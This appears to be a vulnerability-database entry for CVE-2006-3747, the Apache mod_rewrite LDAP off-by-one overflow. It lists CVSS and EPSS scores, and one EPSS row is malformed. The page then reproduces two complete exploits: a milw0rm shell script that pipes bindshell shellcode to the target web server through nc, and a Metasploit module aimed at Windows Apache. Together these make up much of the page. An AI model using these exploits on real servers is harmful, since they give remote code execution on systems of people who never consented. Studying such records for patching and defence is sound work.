CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
7.6
AV:N/AC:H/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
79.46%
–
–
2023-03-12
–
–
–
97.46%
–
2023-03-19
–
–
–
97.5%
–
2023-04-30
–
–
–
97.46%
–
2023-05-14
–
–
–
97.45%
–
2023-06-04
–
–
–
97.44%
–
2023-07-09
–
–
–
97.45%
–
2023-08-20
–
–
–
97.44%
–
2023-09-24
–
–
–
97.41%
–
2023-11-05
–
–
–
97.44%
–
2024-04-07
–
–
–
97.4%
–
2024-06-02
–
–
–
97.4%
–
2024-06-23
–
–
–
97.43%
–
2024-11-17
–
–
–
97.45%
–
2024-12-22
–
–
–
93.52%
–
2025-01-19
–
–
–
93.52%
–
2025-03-18
–
–
–
–
92.04%
2025-03-30
–
–
–
–
92.74%
2025-03-30
–
–
–
–
92.74,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez :P
echo -e "mod_rewrite apache off-by-one overflow"
echo "by jack <jack\x40gulcas\x2eorg>\n\n"
if [ $# -ne 1 ] ; then
echo "Usage: $0 webserver"
exit
fi
host=$1
echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80
# milw0rm.com [2006-08-21]
##
# $Id: apache_mod_rewrite_ldap.rb 8498 2010-02-15 00:48:03Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',
'Description' => %q{
This module exploits the mod_rewrite LDAP protocol scheme handling
flaw discovered by Mark Dowd, which produces an off-by-one overflow.
Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
This module requires REWRITEPATH to be set accurately. In addition,
the target must have 'RewriteEngine on' configured, with a specific
'RewriteRule' condition enabled to allow for exploitation.
The flaw affects multiple platforms, however this module currently
only supports Windows based installations.
},
'Author' => 'patrick',
'Version' => '$Revision: 8498 $',
'References' =>
[
[ 'CVE', '2006-3747' ],
[ 'OSVDB', '27588' ],
[ 'BID', '19204' ],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
[ 'URL', 'http://www.milw0rm.com/exploits/3680' ],
[ 'URL', 'http://www.milw0rm.com/exploits/3996' ],
[ 'URL', 'http://www.milw0rm.com/exploits/2237' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Platform' => ['win'], # 'linux'],
'Payload' =>
{
'Space' => 636,
'BadChars' => "\x00\x0a\x0d\x20",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'StackAdjustment' => -3500,
'DisableNops' => 'True',
},
'Targets' =>
[
[ 'Automatic', {} ], # patrickw tested OK 20090310 win32
],
'DisclosureDate' => 'Jul 28 2006',
'DefaultTarget' => 0))
register_options(
[
OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
], self.class)
end
def check
res = send_request_raw({
'uri' => '/',
'version' => '1.1',
}, 2)
if (res.to_s =~ /Apache/) # This could be smarter.
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
# On Linux Apache, it is possible to overwrite EIP by
# sending ldap://<buf> ... TODO patrickw
trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'
print_status("Sending payload.")
send_request_raw({
'uri' => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded,
'version' => '1.0',
}, 2)
handler
end
end